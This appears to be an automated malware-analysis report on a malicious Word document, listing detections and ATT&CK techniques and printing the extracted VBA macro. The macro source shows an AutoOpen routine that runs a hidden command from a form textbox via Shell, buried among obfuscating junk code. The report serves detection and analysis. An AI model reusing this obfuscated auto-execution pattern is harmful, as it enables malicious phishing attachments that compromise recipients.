MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically an autoopen macro, which is a common technique for initial execution in malicious Office documents. The heuristics indicate a suspicious invocation of cmd.exe and a Shell() call within the VBA code, suggesting the macro is designed to execute external commands. This points towards a downloader or dropper functionality, where the macro likely initiates the download and execution of a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Malware.Generic-6788310-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6788310-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End Select z395718 = Array(A20750205, j4588397, A46205227, Interaction.Shell(Z031056708.TextBox1, 69 - 69), c88335538) Select Case h958 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() S79813691 -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5628 bytes |
SHA-256: 5c4b7cfbd595aee1507861d04d67d45f99dedd7a7e21177f206dd4919da62be3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Z031056708"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
S79813691
End Sub
Attribute VB_Name = "z866180186"
Function S79813691()
On Error Resume Next
Select Case W3276
Case 68081738
F294 = I805
Z140 = Tan(c4733 - Round(G809) / 123649438 - Tan(A1283))
w4329 = H4888
m1787 = Round(B4020 * Chr(131013734))
Case 312971736
v6893 = N257
T612 = 328044188
T102 = w344
u0849 = Round(P766 + Tan(a4766 + Log(333818053) - O303 / Hex(325748759)))
End Select
Select Case w8779
Case 262644571
h4998 = a618
P644 = Tan(s140 - Round(E013) / 321089264 - Tan(I198))
R440 = z6041
T8322 = Round(Y9769 * Chr(88082470))
Case 189700160
o680 = d213
G0550 = 146940329
b346 = z836
B1652 = Round(a1491 + Tan(a635 + Log(98978097) - K210 / Hex(60633436)))
End Select
Select Case J750
Case 268883075
C7476 = K310
P337 = Tan(Z747 - Round(p502) / 156690829 - Tan(N3940))
r194 = j8270
D360 = Round(o2862 * Chr(180981459))
Case 84354809
W625 = A2741
L819 = 321079561
Z5949 = u0558
S1487 = Round(G6337 + Tan(Y8228 + Log(13602940) - S9071 / Hex(146836423)))
End Select
Select Case h445
Case 330353916
v641 = E5679
O831 = Tan(c7664 - Round(f0527) / 58365697 - Tan(B9090))
s5744 = M5337
V5198 = Round(W2395 * Chr(195916462))
Case 218271757
O970 = W972
t337 = 20826771
S795 = k732
V930 = Round(F7075 + Tan(O2398 + Log(105080981) - w5781 / Hex(13820794)))
End Select
z395718 = Array(A20750205, j4588397, A46205227, Interaction.Shell(Z031056708.TextBox1, 69 - 69), c88335538)
Select Case h958
Case 67176432
C2507 = i052
R486 = Tan(X5659 - Round(c1247) / 176546356 - Tan(N714))
O9805 = v985
W186 = Round(U028 * Chr(282075463))
Case 109298656
U9482 = J5208
i961 = 53235108
z1178 = v029
t7803 = Round(E188 + Tan(b035 + Log(100020911) - s290 / Hex(333654878)))
End Select
Select Case h6887
Case 337232737
c617 = N5486
z520 = Tan(U5430 - Round(c5552) / 116080407 - Tan(h070))
d5989 = b1604
C977 = Round(M482 * Chr(263503429))
Case 335932151
N3222 = j515
d2768 = 241315718
N7125 = i648
I885 = Round(Z754 + Tan(Y4936 + Log(79252273) - Y776 / Hex(15777562)))
End Select
Select Case I080
Case 186255587
r582 = E2827
n105 = Tan(z7652 - Round(V546) / 340347001 - Tan(L000))
k6378 = u4868
W820 = Round(w1410 * Chr(147618097))
Case 13073995
p019 = L8514
H928 = 237234785
R972 = r9570
i7823 = Round(w986 + Tan(Q185 + Log(134770088) - n8847 / Hex(326148515)))
End Select
End Function
Attribute VB_Name = "b812926483"
Attribute VB_Name = "a5650599"
Attribute VB_Name = "X3072118"
Attribute VB_Name = "t7761097632"
Attribute VB_Name = "K8575164"
Attribute VB_Name = "X3822163149398"
Attribute VB_Name = "w6333953898"
Attribute VB_Name = "T299343986102"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "A07701028"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "o65332750841"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "L297348918018"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "U02376745493"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "W792180265380"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Q351969289168"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.